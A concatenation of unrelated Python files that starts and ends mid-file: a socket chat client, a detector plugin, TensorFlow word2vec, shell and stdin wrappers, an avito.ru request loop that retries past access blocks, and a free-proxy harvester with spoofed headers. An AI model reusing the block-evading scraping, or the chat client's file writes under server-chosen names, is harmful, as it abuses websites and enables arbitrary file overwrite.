with open(filepath,"r") as f:
self.dataOfChoosedFile = f.read()
print(self.fileName)
pass
def socketHander(self):
self.clientSocket = socket(AF_INET, SOCK_STREAM)
self.clientSocket.connect((serverIp, serverPort))
self.clientSocket.settimeout(2)
self.ip,self.port = self.clientSocket.getsockname()
print("self ip",self.ip)
while True:
            # send the pending message, if any
if len(self.sendMessage) == 0:
pass
else:
if self.isChoosedFile == True:
self.clientSocket.send(json.dumps(self.sendMessage).encode("utf-8"))
self.messageList.AppendText("文件[" + self.fileName + "]发送成功\r\n")
self.fileName = None
self.dataOfChoosedFile = None
self.isChoosedFile = False
self.sendMessage = ""
else:
self.clientSocket.send(json.dumps(self.sendMessage).encode("utf-8"))
self.messageList.AppendText("消息["+self.sendMessage.get("content")+"]发送成功\r\n")
self.input.SetLabelText("")
self.sendMessage = ""
try:
                # receive messages
receivedMessage = self.clientSocket.recv(1024)
receivedMessage = receivedMessage.decode("utf-8")
receivedMessage = json.loads(receivedMessage)
print(receivedMessage)
type = receivedMessage.get("type")
                # the client received a message forwarded by the server
if type == "1":
print("客户端收到消息")
sourceIp = receivedMessage.get("sourceIP")
content = receivedMessage.get("content")
if sourceIp == self.ip:
pass
else:
self.messageList.AppendText("来自:["+sourceIp+"]的消息:["+content+"]\r\n")
elif type == "2":
                    # the client received a user-list refresh request from the server
self.userList = receivedMessage.get("content")
self.setUserList()
elif type == "3":
filename = receivedMessage.get("filename")
print("rrrr",filename)
with open(filename,"w") as f:
f.write(receivedMessage.get("content"))
except:
print("等待数据...")
pass
pass
def setUserList(self):
self.userListTree.DeleteChildren(self.rootID)
for user in self.userList:
# if user == self.ip:
# continue
self.userListTree.AppendItem(self.rootID,user)
pass
def OnClosed(self,event):
endMessage ={
"type":"3",
"content":"bye"
}
self.clientSocket.send(json.dumps(endMessage).encode("utf-8"))
self.Destroy()
if __name__ == '__main__':
global serverIp
serverIp = input("请输入服务器ip")
app = wx.App()
frame = QICQ()
frame.Bind(wx.EVT_CLOSE,frame.OnClosed)
frame.Show()
app.MainLoop()
app.OnExit()
|
baseplugin.py
|
import threading
import queue
import time
import numpy as np
from implotwidget import ImplotWidget
# Photon data. Using fixed size numpy arrays right now.
class PhotonData(object):
def __init__(self, chunksize = 244):
# x, y, and pulse height
self.x = np.zeros(chunksize, dtype = np.uint16)
self.y = np.zeros(chunksize, dtype = np.uint16)
self.p = np.zeros(chunksize, dtype = np.uint16)
#self.seg = np.zeros(chunksize, dtype = np.uint8)
# index of detector segment (one segment per photondata chunk)
self.segment = 0
# Number of valid items in data
self.len = 0
class PluginConfig(object):
def __init__(self):
"""Configuration for each detector segment
xbits, ybits, and pbits must have length that matches segments"""
# Segment configurations
self.segment_configs = [SegmentConfig(xbit = 8, ybit = 8, pbit = 8, segment = 0)]
# Plot configurations
self.plots = [PluginPlotItem()]
# # Number of X bits per segment
# self.xbits = [8]
# # Number of Y bits per segment
# self.ybits = [8]
# # Number of pulse height bits per segment
# self.pbits = [8]
# # Number of detector segments
# self.segments = 1
# # Plot item config
# #self.plots = [PluginPlotItem(row = 0, column = 0, row_span = 1, column_span = 1, segment = 0)]
# self.plot = []
class SegmentConfig(object):
def __init__(self, xbit = 8, ybit = 8, pbit = 8, segment = 0):
"""Configuration for a detector segment"""
self.xbit = xbit
self.ybit = ybit
self.pbit = pbit
self.segment = segment
class PlotConfig(object):
def __init__(self, xbit = 8, ybit = 8, pbit = 8, segment = 0):
"""Configuration for a single plot"""
self.xbit = xbit
self.ybit = ybit
self.pbit = pbit
self.segment = segment
class PluginPlotItem(object):
def __init__(self, plot_config = PlotConfig(), name = ImplotWidget, row = 0, column = 0, row_span = 1,
column_span = 1, segment = 0):
"""Plot item configuration"""
self.name = name
self.row = row
self.column = column
self.row_span = row_span
self.column_span = column_span
self.plot_config = plot_config
# Base plugin. All plugins should inherit this class.
class BasePlugin(object):
def __init__(self):
"""Base plugin class"""
self._config = PluginConfig()
#self._config = config
# Data
self._data = PhotonData()
# Data queue
self._q = queue.SimpleQueue()
# Event used to signal pause/unpause
self._lock = threading.Event()
# Start thread as paused
self._lock.set()
self._sample_thread = threading.Thread(target = self._run)
# Flag for thread close (don't change in thread)
self._flag = False
print("BasePlugin loaded...")
def start(self):
"""Start plugin"""
if (not self._sample_thread.is_alive()):
self._sample_thread.start()
def stop(self):
"""Stop plugin"""
if (self._sample_thread.is_alive()):
# signal to stop thread...
self._flag = True
self.pause()
self._sample_thread.join()
print("thread closed...")
def pause(self):
"""Pause sampler"""
if (self._sample_thread.is_alive()):
self._lock.set()
def unpause(self):
"""Unpause sampler"""
if (self._sample_thread.is_alive()):
# Check that lock is locked...
self._lock.clear()
def get_config(self):
"""Get plugin configuration (of type PluginConfig)"""
return(self._config)
def _run(self):
"""Thread function -- primary sampling thread function"""
while(True):
if (self._lock.is_set()):
# Search for quit flag
if (self._flag):
print("Closing sampling thread")
return
time.sleep(0.01)
continue
# Fill data object with test fake data
#print("baseplugin sampler running...")
for i in range(244):
self._data.x[i] = i
self._data.y[i] = i
self._data.p[i] = i
self._data.segment = 0
self._data.len = 244
# Queue up the data...
self._q.put(self._data)
time.sleep(0.1)
def get_data(self):
"""Get sampler data
Return data if available
Return None if no data available
"""
if (not self._q.empty()):
try:
d = self._q.get_nowait()
except queue.Empty:
d = None
return(d)
else:
return(None)
def get_data_len(self):
"""Get amount of data in queue"""
return(self._q.qsize())
def load_plugin():
p = BasePlugin()
return(p)
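if __name__ == "__main__":
    # Hedged usage sketch (added for illustration, not part of the original module): run the base
    # plugin briefly, drain one chunk of the fake photon data it generates, then stop the thread.
    plugin = load_plugin()
    plugin.start()
    plugin.unpause()
    time.sleep(0.3)
    chunk = plugin.get_data()
    if chunk is not None:
        print("got {} photons from segment {}".format(chunk.len, chunk.segment))
    plugin.stop()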
|
word2vec_optimized.py
|
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Multi-threaded word2vec unbatched skip-gram model.
Trains the model described in:
Mikolov et al., "Efficient Estimation of Word Representations in Vector Space",
ICLR 2013.
http://arxiv.org/abs/1301.3781
This model does true SGD (i.e. no minibatching). To do this efficiently, custom
ops are used to sequentially process data within a 'batch'.
The key ops used are:
* skipgram custom op that does input processing.
* neg_train custom op that efficiently calculates and applies the gradient using
true SGD.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import threading
import time
from six.moves import xrange # pylint: disable=redefined-builtin
import numpy as np
import tensorflow as tf
from tensorflow.models.embedding import gen_word2vec as word2vec
flags = tf.app.flags
flags.DEFINE_string("save_path", None, "Directory to write the model.")
flags.DEFINE_string(
"train_data", None,
"Training data. E.g., unzipped file http://mattmahoney.net/dc/text8.zip.")
flags.DEFINE_string(
"eval_data", None, "Analogy questions. "
"https://word2vec.googlecode.com/svn/trunk/questions-words.txt.")
flags.DEFINE_integer("embedding_size", 200, "The embedding dimension size.")
flags.DEFINE_integer(
"epochs_to_train", 15,
"Number of epochs to train. Each epoch processes the training data once "
"completely.")
flags.DEFINE_float("learning_rate", 0.025, "Initial learning rate.")
flags.DEFINE_integer("num_neg_samples", 25,
"Negative samples per training example.")
flags.DEFINE_integer("batch_size", 500,
"Numbers of training examples each step processes "
"(no minibatching).")
flags.DEFINE_integer("concurrent_steps", 12,
"The number of concurrent training steps.")
flags.DEFINE_integer("window_size", 5,
"The number of words to predict to the left and right "
"of the target word.")
flags.DEFINE_integer("min_count", 5,
"The minimum number of word occurrences for it to be "
"included in the vocabulary.")
flags.DEFINE_float("subsample", 1e-3,
"Subsample threshold for word occurrence. Words that appear "
"with higher frequency will be randomly down-sampled. Set "
"to 0 to disable.")
flags.DEFINE_boolean(
"interactive", False,
"If true, enters an IPython interactive session to play with the trained "
"model. E.g., try model.analogy('france', 'paris', 'russia') and "
"model.nearby(['proton', 'elephant', 'maxwell']")
FLAGS = flags.FLAGS
class Options(object):
"""Options used by our word2vec model."""
def __init__(self):
# Model options.
# Embedding dimension.
self.emb_dim = FLAGS.embedding_size
# Training options.
# The training text file.
self.train_data = FLAGS.train_data
# Number of negative samples per example.
self.num_samples = FLAGS.num_neg_samples
# The initial learning rate.
self.learning_rate = FLAGS.learning_rate
# Number of epochs to train. After these many epochs, the learning
# rate decays linearly to zero and the training stops.
self.epochs_to_train = FLAGS.epochs_to_train
# Concurrent training steps.
self.concurrent_steps = FLAGS.concurrent_steps
# Number of examples for one training step.
self.batch_size = FLAGS.batch_size
# The number of words to predict to the left and right of the target word.
self.window_size = FLAGS.window_size
# The minimum number of word occurrences for it to be included in the
# vocabulary.
self.min_count = FLAGS.min_count
# Subsampling threshold for word occurrence.
self.subsample = FLAGS.subsample
# Where to write out summaries.
self.save_path = FLAGS.save_path
# Eval options.
# The text file for eval.
self.eval_data = FLAGS.eval_data
class Word2Vec(object):
"""Word2Vec model (Skipgram)."""
def __init__(self, options, session):
self._options = options
self._session = session
self._word2id = {}
self._id2word = []
self.build_graph()
self.build_eval_graph()
self.save_vocab()
self._read_analogies()
def _read_analogies(self):
"""Reads through the analogy question file.
Returns:
questions: a [n, 4] numpy array containing the analogy question's
word ids.
questions_skipped: questions skipped due to unknown words.
"""
questions = []
questions_skipped = 0
with open(self._options.eval_data, "rb") as analogy_f:
for line in analogy_f:
if line.startswith(b":"): # Skip comments.
continue
words = line.strip().lower().split(b" ")
ids = [self._word2id.get(w.strip()) for w in words]
if None in ids or len(ids) != 4:
questions_skipped += 1
else:
questions.append(np.array(ids))
print("Eval analogy file: ", self._options.eval_data)
print("Questions: ", len(questions))
print("Skipped: ", questions_skipped)
self._analogy_questions = np.array(questions, dtype=np.int32)
def build_graph(self):
"""Build the model graph."""
opts = self._options
# The training data. A text file.
(words, counts, words_per_epoch, current_epoch, total_words_processed,
examples, labels) = word2vec.skipgram(filename=opts.train_data,
batch_size=opts.batch_size,
window_size=opts.window_size,
min_count=opts.min_count,
subsample=opts.subsample)
(opts.vocab_words, opts.vocab_counts,
opts.words_per_epoch) = self._session.run([words, counts, words_per_epoch])
opts.vocab_size = len(opts.vocab_words)
print("Data file: ", opts.train_data)
print("Vocab size: ", opts.vocab_size - 1, " + UNK")
print("Words per epoch: ", opts.words_per_epoch)
self._id2word = opts.vocab_words
for i, w in enumerate(self._id2word):
self._word2id[w] = i
# Declare all variables we need.
# Input words embedding: [vocab_size, emb_dim]
w_in = tf.Variable(
tf.random_uniform(
[opts.vocab_size,
opts.emb_dim], -0.5 / opts.emb_dim, 0.5 / opts.emb_dim),
name="w_in")
    # Output words embedding (softmax weights): [vocab_size, emb_dim]
w_out = tf.Variable(tf.zeros([opts.vocab_size, opts.emb_dim]), name="w_out")
# Global step: []
global_step = tf.Variable(0, name="global_step")
# Linear learning rate decay.
words_to_train = float(opts.words_per_epoch * opts.epochs_to_train)
lr = opts.learning_rate * tf.maximum(
0.0001,
1.0 - tf.cast(total_words_processed, tf.float32) / words_to_train)
# Training nodes.
inc = global_step.assign_add(1)
with tf.control_dependencies([inc]):
train = word2vec.neg_train(w_in,
w_out,
examples,
labels,
lr,
vocab_count=opts.vocab_counts.tolist(),
num_negative_samples=opts.num_samples)
self._w_in = w_in
self._examples = examples
self._labels = labels
self._lr = lr
self._train = train
self.step = global_step
self._epoch = current_epoch
self._words = total_words_processed
def save_vocab(self):
"""Save the vocabulary to a file so the model can be reloaded."""
opts = self._options
with open(os.path.join(opts.save_path, "vocab.txt"), "w") as f:
for i in xrange(opts.vocab_size):
f.write("%s %d\n" % (tf.compat.as_text(opts.vocab_words[i]),
opts.vocab_counts[i]))
def build_eval_graph(self):
"""Build the evaluation graph."""
# Eval graph
opts = self._options
# Each analogy task is to predict the 4th word (d) given three
# words: a, b, c. E.g., a=italy, b=rome, c=france, we should
# predict d=paris.
# The eval feeds three vectors of word ids for a, b, c, each of
# which is of size N, where N is the number of analogies we want to
# evaluate in one batch.
analogy_a = tf.placeholder(dtype=tf.int32) # [N]
analogy_b = tf.placeholder(dtype=tf.int32) # [N]
analogy_c = tf.placeholder(dtype=tf.int32) # [N]
# Normalized word embeddings of shape [vocab_size, emb_dim].
nemb = tf.nn.l2_normalize(self._w_in, 1)
# Each row of a_emb, b_emb, c_emb is a word's embedding vector.
# They all have the shape [N, emb_dim]
a_emb = tf.gather(nemb, analogy_a) # a's embs
b_emb = tf.gather(nemb, analogy_b) # b's embs
c_emb = tf.gather(nemb, analogy_c) # c's embs
# We expect that d's embedding vectors on the unit hyper-sphere is
# near: c_emb + (b_emb - a_emb), which has the shape [N, emb_dim].
target = c_emb + (b_emb - a_emb)
# Compute cosine distance between each pair of target and vocab.
# dist has shape [N, vocab_size].
dist = tf.matmul(target, nemb, transpose_b=True)
# For each question (row in dist), find the top 4 words.
_, pred_idx = tf.nn.top_k(dist, 4)
# Nodes for computing neighbors for a given word according to
# their cosine distance.
nearby_word = tf.placeholder(dtype=tf.int32) # word id
nearby_emb = tf.gather(nemb, nearby_word)
nearby_dist = tf.matmul(nearby_emb, nemb, transpose_b=True)
nearby_val, nearby_idx = tf.nn.top_k(nearby_dist,
min(1000, opts.vocab_size))
# Nodes in the construct graph which are used by training and
# evaluation to run/feed/fetch.
self._analogy_a = analogy_a
self._analogy_b = analogy_b
self._analogy_c = analogy_c
self._analogy_pred_idx = pred_idx
self._nearby_word = nearby_word
self._nearby_val = nearby_val
self._nearby_idx = nearby_idx
# Properly initialize all variables.
tf.initialize_all_variables().run()
self.saver = tf.train.Saver()
def _train_thread_body(self):
initial_epoch, = self._session.run([self._epoch])
while True:
_, epoch = self._session.run([self._train, self._epoch])
if epoch != initial_epoch:
break
def train(self):
"""Train the model."""
opts = self._options
initial_epoch, initial_words = self._session.run([self._epoch, self._words])
workers = []
for _ in xrange(opts.concurrent_steps):
t = threading.Thread(target=self._train_thread_body)
t.start()
workers.append(t)
last_words, last_time = initial_words, time.time()
while True:
      time.sleep(5)  # Report progress once in a while.
(epoch, step, words,
lr) = self._session.run([self._epoch, self.step, self._words, self._lr])
now = time.time()
last_words, last_time, rate = words, now, (words - last_words) / (
now - last_time)
print("Epoch %4d Step %8d: lr = %5.3f words/sec = %8.0f\r" % (epoch, step,
lr, rate),
end="")
sys.stdout.flush()
if epoch != initial_epoch:
break
for t in workers:
t.join()
def _predict(self, analogy):
"""Predict the top 4 answers for analogy questions."""
idx, = self._session.run([self._analogy_pred_idx], {
self._analogy_a: analogy[:, 0],
self._analogy_b: analogy[:, 1],
self._analogy_c: analogy[:, 2]
})
return idx
def eval(self):
"""Evaluate analogy questions and reports accuracy."""
# How many questions we get right at precision@1.
correct = 0
total = self._analogy_questions.shape[0]
start = 0
while start < total:
limit = start + 2500
sub = self._analogy_questions[start:limit, :]
idx = self._predict(sub)
start = limit
for question in xrange(sub.shape[0]):
for j in xrange(4):
if idx[question, j] == sub[question, 3]:
# Bingo! We predicted correctly. E.g., [italy, rome, france, paris].
correct += 1
break
elif idx[question, j] in sub[question, :3]:
# We need to skip words already in the question.
continue
else:
# The correct label is not the precision@1
break
print()
print("Eval %4d/%d accuracy = %4.1f%%" % (correct, total,
correct * 100.0 / total))
def analogy(self, w0, w1, w2):
"""Predict word w3 as in w0:w1 vs w2:w3."""
wid = np.array([[self._word2id.get(w, 0) for w in [w0, w1, w2]]])
idx = self._predict(wid)
for c in [self._id2word[i] for i in idx[0, :]]:
if c not in [w0, w1, w2]:
return c
return "unknown"
def nearby(self, words, num=20):
"""Prints out nearby words given a list of words."""
ids = np.array([self._word2id.get(x, 0) for x in words])
vals, idx = self._session.run(
[self._nearby_val, self._nearby_idx], {self._nearby_word: ids})
for i in xrange(len(words)):
print("\n%s\n=====================================" % (words[i]))
for (neighbor, distance) in zip(idx[i, :num], vals[i, :num]):
print("%-20s %6.4f" % (self._id2word[neighbor], distance))
def _start_shell(local_ns=None):
# An interactive shell is useful for debugging/development.
import IPython
user_ns = {}
if local_ns:
user_ns.update(local_ns)
user_ns.update(globals())
IPython.start_ipython(argv=[], user_ns=user_ns)
def main(_):
"""Train a word2vec model."""
if not FLAGS.train_data or not FLAGS.eval_data or not FLAGS.save_path:
print("--train_data --eval_data and --save_path must be specified.")
sys.exit(1)
opts = Options()
with tf.Graph().as_default(), tf.Session() as session:
with tf.device("/cpu:0"):
model = Word2Vec(opts, session)
for _ in xrange(opts.epochs_to_train):
model.train() # Process one epoch
model.eval() # Eval analogies.
# Perform a final save.
model.saver.save(session, os.path.join(opts.save_path, "model.ckpt"),
global_step=model.step)
if FLAGS.interactive:
# E.g.,
      # [0]: model.analogy('france', 'paris', 'russia')
      # [1]: model.nearby(['proton', 'elephant', 'maxwell'])
_start_shell(locals())
if __name__ == "__main__":
tf.app.run()
|
rubash.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Hint: https://stackoverflow.com/questions/19880190/interactive-input-output-using-python
# and https://stackoverflow.com/questions/31833897/python-read-from-subprocess-stdout-and-stderr-separately-while-preserving-order
# MS-DOS interactive cmd.exe: https://stackoverflow.com/a/33061437/966789
# Welcome to screen scraping world
# If the aliases are defined in the Python code, they will work everywhere - both on Windows and on Linux
import sys
import os
from subprocess import Popen, PIPE, STDOUT
import errno
import select
from multiprocessing import Process
import time
def Dump(fd):
reads = [fd]
while True:
ret = select.select(reads, [], [])
s = os.read(ret[0][0],4096)
sys.stdout.write(s)
sys.stdout.flush()
if sys.platform.startswith("linux"):
p = Popen("/bin/bash", shell = True, stdin = PIPE, stdout = PIPE, stderr = STDOUT, bufsize = 1)
proc = Process(target=Dump, args=(p.stdout.fileno(),))
proc.start()
while True:
if sys.platform == "win32":
p = Popen("cmd.exe /k ", shell = True, stdin = PIPE, stdout = PIPE, stderr = STDOUT, bufsize = 1)
s = raw_input("> ")
s = s.rstrip("\\") # Чтобы не уходило в бесконечный цикл
    ss = s.strip() # in case spaces were accidentally typed around "exit"
if ss == "exit":
proc.terminate()
break
    if len(ss) == 0: continue # the line contains nothing but whitespace
try:
if sys.platform.startswith("linux"):
p.stdin.write(s+"\n")
elif sys.platform == "win32":
p.stdin.write(s+"\r\n")
p.stdin.flush()
except IOError as e:
if e.errno == errno.EPIPE:
break
# stdout
if sys.platform == "win32":
while True:
try:
output,error = p.communicate()
sys.stdout.write(output+"\r\n")
except IOError as e:
continue
else:
break
    time.sleep(0.2) # so the stdout output does not overwrite the prompt
|
winpty.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from threading import Thread
from cStringIO import StringIO
from Queue import Queue, Empty
class WinPty:
def __init__(self, stdin):
self._s = stdin
self._q = Queue()
def _read_next_char(stdin, queue):
while True:
char = stdin.read(1) # potentially blocking read
if char:
queue.put(char)
else:
break
self._t = Thread(target=_read_next_char, args=(self._s, self._q))
self._t.daemon = True
self._t.start() # read characters asynchronously from stdin
def read(self, blksize=-1, timeout=1):
buf = StringIO()
count = 0
try:
while count < blksize or blksize == -1:
next = self._q.get(block=timeout is not None, timeout=timeout)
buf.write(next)
count = count + 1
except Empty:
pass
return buf.getvalue()
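if __name__ == "__main__":
    # Hedged usage sketch (added for illustration, not part of the original module): wrap this
    # process's own stdin and poll it without blocking forever; type a line within one second to
    # see it echoed back.
    import sys
    pty = WinPty(sys.stdin)
    data = pty.read(blksize=16, timeout=1)
    print("read %d characters: %r" % (len(data), data))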
|
tests.py
|
import time
from contextlib import suppress
from datetime import datetime
from logging.handlers import RotatingFileHandler
from threading import Thread
import prequests
import logging
from prequests import content_has
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s.%(msecs)03d|%(levelname)-4.4s|%(thread)-6.6s|%(funcName)-10.10s|%(message)s',
handlers=[logging.StreamHandler(),
RotatingFileHandler("log.log", maxBytes=100000000, backupCount=4)
])
def f():
while True:
try:
# prequests.Proxies.instance(proxies=['39.137.95.70:80'])
resp = prequests.get('https://www.avito.ru/sankt-peterburg/detskaya_odezhda_i_obuv/shapki_trikotazhnye_velyur_mei_molo_polarn_lindex_1917349145',
retry_on=(content_has('временно ограничен'), content_has('Доступ временно заблокирован')))
except Exception as e:
logging.exception('Exception while getting avito.ru')
threads = [Thread(target=f) for i in range(1)]
[t.start() for t in threads]
time.sleep(10000)
|
proxy-scraper.py
|
####### ##########
####### #######
'''
Date: August 2016
Script downloads the best HTTP proxies from free proxy websites
Saves a txt file with 1 proxy per line
This list can easily be used with other bots/programs
'''
####### #######
####### ##########
import time
import datetime
import urllib, urllib2
import threading
import Queue
import re
import StringIO
import gzip
import sys
import socket
socket.setdefaulttimeout(90)
# Reference https://love-python.blogspot.ca/2008/07/check-status-proxy-address.html
def is_bad_proxy(currentProxy):
try:
proxy_handler = urllib2.ProxyHandler({'http': currentProxy})
opener = urllib2.build_opener(proxy_handler)
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
urllib2.install_opener(opener)
req = urllib2.Request('http://www.example.com') # change the URL to test here
sock = urllib2.urlopen(req)
except urllib2.HTTPError, e:
print 'Error code: ', e.code
return e.code
except Exception, detail:
print "ERROR:", detail
return True
return False
def remove_tags(text):
"""Remove html tags from a string"""
clean = re.compile('<.*?>')
return re.sub(clean, '', text)
def queueThread():
global proxyCount
ts = time.time()
thedate = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d-%H-%M-%S')
print ("Saving to proxylist-" + thedate + ".txt")
fout = open("proxylist-" + thedate + ".txt", "w")
while not workerQueue.empty():
line = remove_tags(workerQueue.get())
# if the port number is missing for the proxy
# add port 8080 as temporary port
# since it is the most popular port.
if line.endswith(':'):
line += '8080'
fout.write(line + "\n")
proxyCount+=1
fout.close()
def usproxy():
print "Grabbing: http://www.us-proxy.org/"
templs = []
url = "http://www.us-proxy.org/"
try:
opener = urllib2.build_opener()
opener.addheaders = [('Host', 'www.proxylisty.com'),
('Connection', 'keep-alive'),
('Cache-Control', 'max-age=0'),
('Accept','text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'),
('Upgrade-Insecure-Requests', '1'),
('User-agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36'),
('Referer', 'https://www.google.co.za/'),
('Accept-Encoding','gzip, deflate, sdch'),
('Accept-Language','en-US,en;q=0.8')]
response = opener.open(url, timeout=10)
html = response.read()
templs = re.findall(r'<tr><td>(.*?)</td><td>', html)
templs2 = re.findall(r'</td><td>[1-99999].*?</td><td>', html)
for i in range(len(templs)):
temp = templs[i] + ":" + templs2[i].replace('</td><td>', '')
workerQueue.put(temp)
# ("usproxy() " + templs[i] + ":" + templs2[i].replace('</td><td>', ''))
except Exception, e:
if e.message == " ":
print ''
else:
print e.message
print "Failed to grab " + "'" + url + "'"
def proxylist():
print "Grabbing: http://proxy-list.org/"
primary_url = "http://proxy-list.org/english/index.php?p="
urls = []
for i in range(1, 11):
urls.append(primary_url + str(i))
for url in urls:
try:
opener = urllib2.build_opener()
opener.addheaders = [('Host', 'www.proxylisty.com'),
('Connection', 'keep-alive'),
('Cache-Control', 'max-age=0'),
('Accept','text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'),
('Upgrade-Insecure-Requests', '1'),
('User-agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36'),
('Referer', 'https://www.google.co.za/'),
('Accept-Encoding','gzip, deflate, sdch'),
('Accept-Language','en-US,en;q=0.8')]
response = opener.open(url, timeout=10)
compressedFile = StringIO.StringIO()
compressedFile.write(response.read())
compressedFile.seek(0)
decompessedFile = gzip.GzipFile(fileobj=compressedFile, mode='rb')
html = decompessedFile.read()
templs = re.findall(r'<li class="proxy">([1-99999].*)?</li>', html)
for line in templs:
workerQueue.put(line)
except Exception, e:
if e.message == " ":
print ''
else:
print e.message
print "Failed to grab " + "'" + url + "'"
def coolproxy():
print "Grabbing: http://www.cool-proxy.net/"
primary_url = "http://www.cool-proxy.net/proxies/http_proxy_list/sort:score/direction:desc/page:"
urls = []
for i in range(1, 13):
urls.append(primary_url + str(i))
for url in urls:
try:
opener = urllib2.build_opener()
opener.addheaders = [('Host', 'www.proxylisty.com'),
('Connection', 'keep-alive'),
('Cache-Control', 'max-age=0'),
('Accept','text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'),
('Upgrade-Insecure-Requests', '1'),
('User-agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36'),
('Referer', 'https://www.google.co.za/'),
('Accept-Encoding','gzip, deflate, sdch'),
('Accept-Language','en-US,en;q=0.8')]
response = opener.open(url, timeout=10)
compressedFile = StringIO.StringIO()
compressedFile.write(response.read())
compressedFile.seek(0)
decompessedFile = gzip.GzipFile(fileobj=compressedFile, mode='rb')
html = decompessedFile.read()
templs = re.findall(r'str_rot13(.*?)</script>', html)
templs2 = re.findall(r'<td>[1-99999].*?</td>', html)
for i in range(len(templs)):
temp = templs[i].replace('("', '')#remove front of string
temp = temp.replace('")))', '')#remove back of string
temp = temp.decode('rot13').decode('base64')#decode from rot13 then from base64
workerQueue.put(temp + templs2[i].replace('<td>', ':').replace('</td>', ''))
# bug("coolproxy() " + temp + templs2[i].replace('<td>', ':').replace('</td>', ''))
except Exception, e:
if e.message == " ":
print ''
else:
print e.message
print "Failed to grab " + "'" + url + "'"
def freeproxylist():
print "Grabbing: http://free-proxy-list.net/"
url = "http://free-proxy-list.net/"
try:
opener = urllib2.build_opener()
opener.addheaders = [('Host', 'www.proxylisty.com'),
('Connection', 'keep-alive'),
('Cache-Control', 'max-age=0'),
('Accept','text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'),
('Upgrade-Insecure-Requests', '1'),
('User-agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36'),
('Referer', 'https://www.google.co.za/'),
('Accept-Encoding','gzip, deflate, sdch'),
('Accept-Language','en-US,en;q=0.8')]
response = opener.open(url, timeout=10)
html = response.read()
templs = re.findall(r'<tr><td>(.*?)</td><td>', html)
templs2 = re.findall(r'</td><td>[1-99999].*?</td><td>', html)
for i in range(len(templs)):
workerQueue.put(templs[i] + ":" + templs2[i].replace('</td><td>', ''))
# bug("freeproxylist() " + templs[i] + ":" + templs2[i].replace('</td><td>', ''))
except Exception, e:
if e.message == " ":
print ''
else:
print e.message
print "Failed to grab " + "'" + url + "'"
def samair():
print "Grabbing: http://www.samair.ru/"
primary_url = "http://www.samair.ru/proxy/proxy-00.htm"
urls = []
for i in range(1, 31):
if i < 10:
urls.append(primary_url.replace("00", "0" + str(i)))
else:
urls.append(primary_url.replace("00", str(i)))
for url in urls:
try:
opener = urllib2.build_opener()
opener.addheaders = [('Host', 'www.proxylisty.com'),
('Connection', 'keep-alive'),
('Cache-Control', 'max-age=0'),
('Accept','text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'),
('Upgrade-Insecure-Requests', '1'),
('User-agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36'),
('Referer', 'https://www.google.co.za/'),
('Accept-Encoding','gzip, deflate, sdch'),
('Accept-Language','en-US,en;q=0.8')]
response = opener.open(url, timeout=10)
compressedFile = StringIO.StringIO()
compressedFile.write(response.read())
compressedFile.seek(0)
decompessedFile = gzip.GzipFile(fileobj=compressedFile, mode='rb')
html = decompessedFile.read()
links = re.findall(r'<tr><td>(.*?):(.*?)</td><td>', html)
for link in links:
workerQueue.put(link[0] + ":" + link[1])
# bug("samair() " + link[0] + ":" + link[1])
except Exception, e:
if e.message == " ":
print ''
else:
print e.message
print "Failed to grab " + "'" + url + "'"
def proxylisty():
print "Grabbing: http://www.proxylisty.com/"
primary_url = "http://www.proxylisty.com/ip-proxylist-"
urls = []
for i in range(1, 68):
urls.append(primary_url + str(i))
for url in urls:
try:
opener = urllib2.build_opener()
opener.addheaders = [('Host', 'www.proxylisty.com'),
('Connection', 'keep-alive'),
('Cache-Control', 'max-age=0'),
('Accept','text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'),
('Upgrade-Insecure-Requests', '1'),
('User-agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36'),
('Referer', 'https://www.google.co.za/'),
('Accept-Encoding','gzip, deflate, sdch'),
('Accept-Language','en-US,en;q=0.8')]
response = opener.open(url, timeout=10)
compressedFile = StringIO.StringIO()
compressedFile.write(response.read())
compressedFile.seek(0)
decompessedFile = gzip.GzipFile(fileobj=compressedFile, mode='rb')
html = decompessedFile.read()
templs = re.findall(r'<tr>\n<td>(.*?)</td>', html)
templs2 = re.findall(r'com/port/(.*?)-ip-list', html)
for i in range(len(templs)):
